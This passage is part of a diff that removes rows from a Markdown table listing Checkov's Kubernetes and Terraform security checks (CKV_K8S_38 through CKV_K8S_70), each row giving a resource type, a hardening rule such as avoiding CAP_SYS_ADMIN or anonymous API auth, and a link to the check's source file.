-| 2820 | CKV_K8S_38               | resource                         | DaemonSet                                                                                        | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2821 | CKV_K8S_38               | resource                         | Deployment                                                                                       | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2822 | CKV_K8S_38               | resource                         | Job                                                                                              | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2823 | CKV_K8S_38               | resource                         | Pod                                                                                              | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2824 | CKV_K8S_38               | resource                         | ReplicaSet                                                                                       | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2825 | CKV_K8S_38               | resource                         | ReplicationController                                                                            | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2826 | CKV_K8S_38               | resource                         | StatefulSet                                                                                      | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                              |
-| 2827 | CKV_K8S_39               | resource                         | CronJob                                                                                          | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2828 | CKV_K8S_39               | resource                         | DaemonSet                                                                                        | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2829 | CKV_K8S_39               | resource                         | Deployment                                                                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2830 | CKV_K8S_39               | resource                         | DeploymentConfig                                                                                 | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2831 | CKV_K8S_39               | resource                         | Job                                                                                              | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2832 | CKV_K8S_39               | resource                         | Pod                                                                                              | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2833 | CKV_K8S_39               | resource                         | PodTemplate                                                                                      | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2834 | CKV_K8S_39               | resource                         | ReplicaSet                                                                                       | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2835 | CKV_K8S_39               | resource                         | ReplicationController                                                                            | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2836 | CKV_K8S_39               | resource                         | StatefulSet                                                                                      | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Kubernetes              | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesSysAdmin.py)                                                                |
-| 2837 | CKV_K8S_39               | resource                         | kubernetes_deployment                                                                            | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 2838 | CKV_K8S_39               | resource                         | kubernetes_deployment_v1                                                                         | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 2839 | CKV_K8S_39               | resource                         | kubernetes_pod                                                                                   | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 2840 | CKV_K8S_39               | resource                         | kubernetes_pod_v1                                                                                | Do not use the CAP_SYS_ADMIN linux capability                                                                                                                                                            | Terraform               | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py)                                                          |
-| 2841 | CKV_K8S_40               | resource                         | CronJob                                                                                          | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2842 | CKV_K8S_40               | resource                         | DaemonSet                                                                                        | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2843 | CKV_K8S_40               | resource                         | Deployment                                                                                       | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2844 | CKV_K8S_40               | resource                         | Job                                                                                              | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2845 | CKV_K8S_40               | resource                         | Pod                                                                                              | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2846 | CKV_K8S_40               | resource                         | ReplicaSet                                                                                       | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2847 | CKV_K8S_40               | resource                         | ReplicationController                                                                            | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2848 | CKV_K8S_40               | resource                         | StatefulSet                                                                                      | Containers should run as a high UID to avoid host conflict                                                                                                                                               | Kubernetes              | [RootContainersHighUID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersHighUID.py)                                                                            |
-| 2849 | CKV_K8S_41               | resource                         | ServiceAccount                                                                                   | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccount.py)                                                                            |
-| 2850 | CKV_K8S_41               | resource                         | kubernetes_service_account                                                                       | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                      |
-| 2851 | CKV_K8S_41               | resource                         | kubernetes_service_account_v1                                                                    | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py)                                                                      |
-| 2852 | CKV_K8S_42               | resource                         | ClusterRoleBinding                                                                               | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py)                                                              |
-| 2853 | CKV_K8S_42               | resource                         | RoleBinding                                                                                      | Ensure that default service accounts are not actively used                                                                                                                                               | Kubernetes              | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultServiceAccountBinding.py)                                                              |
-| 2854 | CKV_K8S_42               | resource                         | kubernetes_cluster_role_binding                                                                  | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 2855 | CKV_K8S_42               | resource                         | kubernetes_cluster_role_binding_v1                                                               | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 2856 | CKV_K8S_42               | resource                         | kubernetes_role_binding                                                                          | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 2857 | CKV_K8S_42               | resource                         | kubernetes_role_binding_v1                                                                       | Ensure that default service accounts are not actively used                                                                                                                                               | Terraform               | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py)                                                        |
-| 2858 | CKV_K8S_43               | resource                         | CronJob                                                                                          | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2859 | CKV_K8S_43               | resource                         | DaemonSet                                                                                        | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2860 | CKV_K8S_43               | resource                         | Deployment                                                                                       | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2861 | CKV_K8S_43               | resource                         | DeploymentConfig                                                                                 | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2862 | CKV_K8S_43               | resource                         | Job                                                                                              | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2863 | CKV_K8S_43               | resource                         | Pod                                                                                              | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2864 | CKV_K8S_43               | resource                         | PodTemplate                                                                                      | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2865 | CKV_K8S_43               | resource                         | ReplicaSet                                                                                       | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2866 | CKV_K8S_43               | resource                         | ReplicationController                                                                            | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2867 | CKV_K8S_43               | resource                         | StatefulSet                                                                                      | Image should use digest                                                                                                                                                                                  | Kubernetes              | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageDigest.py)                                                                                                |
-| 2868 | CKV_K8S_43               | resource                         | kubernetes_deployment                                                                            | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 2869 | CKV_K8S_43               | resource                         | kubernetes_deployment_v1                                                                         | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 2870 | CKV_K8S_43               | resource                         | kubernetes_pod                                                                                   | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 2871 | CKV_K8S_43               | resource                         | kubernetes_pod_v1                                                                                | Image should use digest                                                                                                                                                                                  | Terraform               | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py)                                                                                          |
-| 2872 | CKV_K8S_44               | resource                         | Service                                                                                          | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Kubernetes              | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerService.py)                                                                                            |
-| 2873 | CKV_K8S_44               | resource                         | kubernetes_service                                                                               | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform               | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                      |
-| 2874 | CKV_K8S_44               | resource                         | kubernetes_service_v1                                                                            | Ensure that the Tiller Service (Helm v2) is deleted                                                                                                                                                      | Terraform               | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py)                                                                                      |
-| 2875 | CKV_K8S_45               | resource                         | CronJob                                                                                          | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2876 | CKV_K8S_45               | resource                         | DaemonSet                                                                                        | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2877 | CKV_K8S_45               | resource                         | Deployment                                                                                       | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2878 | CKV_K8S_45               | resource                         | DeploymentConfig                                                                                 | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2879 | CKV_K8S_45               | resource                         | Job                                                                                              | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2880 | CKV_K8S_45               | resource                         | Pod                                                                                              | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2881 | CKV_K8S_45               | resource                         | PodTemplate                                                                                      | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2882 | CKV_K8S_45               | resource                         | ReplicaSet                                                                                       | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2883 | CKV_K8S_45               | resource                         | ReplicationController                                                                            | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2884 | CKV_K8S_45               | resource                         | StatefulSet                                                                                      | Ensure the Tiller Deployment (Helm V2) is not accessible from within the cluster                                                                                                                         | Kubernetes              | [TillerDeploymentListener.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/TillerDeploymentListener.py)                                                                      |
-| 2885 | CKV_K8S_49               | resource                         | ClusterRole                                                                                      | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Kubernetes              | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py)                                                                                            |
-| 2886 | CKV_K8S_49               | resource                         | Role                                                                                             | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Kubernetes              | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/WildcardRoles.py)                                                                                            |
-| 2887 | CKV_K8S_49               | resource                         | kubernetes_cluster_role                                                                          | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 2888 | CKV_K8S_49               | resource                         | kubernetes_cluster_role_v1                                                                       | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 2889 | CKV_K8S_49               | resource                         | kubernetes_role                                                                                  | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 2890 | CKV_K8S_49               | resource                         | kubernetes_role_v1                                                                               | Minimize wildcard use in Roles and ClusterRoles                                                                                                                                                          | Terraform               | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py)                                                                                      |
-| 2891 | CKV_K8S_68               | resource                         | CronJob                                                                                          | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2892 | CKV_K8S_68               | resource                         | DaemonSet                                                                                        | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2893 | CKV_K8S_68               | resource                         | Deployment                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2894 | CKV_K8S_68               | resource                         | DeploymentConfig                                                                                 | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2895 | CKV_K8S_68               | resource                         | Job                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2896 | CKV_K8S_68               | resource                         | Pod                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2897 | CKV_K8S_68               | resource                         | PodTemplate                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2898 | CKV_K8S_68               | resource                         | ReplicaSet                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2899 | CKV_K8S_68               | resource                         | ReplicationController                                                                            | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2900 | CKV_K8S_68               | resource                         | StatefulSet                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py)                                                                          |
-| 2901 | CKV_K8S_69               | resource                         | CronJob                                                                                          | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2902 | CKV_K8S_69               | resource                         | DaemonSet                                                                                        | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2903 | CKV_K8S_69               | resource                         | Deployment                                                                                       | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2904 | CKV_K8S_69               | resource                         | DeploymentConfig                                                                                 | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2905 | CKV_K8S_69               | resource                         | Job                                                                                              | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2906 | CKV_K8S_69               | resource                         | Pod                                                                                              | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2907 | CKV_K8S_69               | resource                         | PodTemplate                                                                                      | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2908 | CKV_K8S_69               | resource                         | ReplicaSet                                                                                       | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2909 | CKV_K8S_69               | resource                         | ReplicationController                                                                            | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2910 | CKV_K8S_69               | resource                         | StatefulSet                                                                                      | Ensure that the --basic-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py)                                                                          |
-| 2911 | CKV_K8S_70               | resource                         | CronJob                                                                                          | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2912 | CKV_K8S_70               | resource                         | DaemonSet                                                                                        | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2913 | CKV_K8S_70               | resource                         | Deployment                                                                                       | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2914 | CKV_K8S_70               | resource                         | DeploymentConfig                                                                                 | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2915 | CKV_K8S_70               | resource                         | Job                                                                                              | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2916 | CKV_K8S_70               | resource                         | Pod                                                                                              | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
-| 2917 | CKV_K8S_70               | resource                         | PodTemplate                                                                                      | Ensure that the --token-auth-file argument is not set                                                                                                                                                    | Kubernetes              | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py)                                                                          |
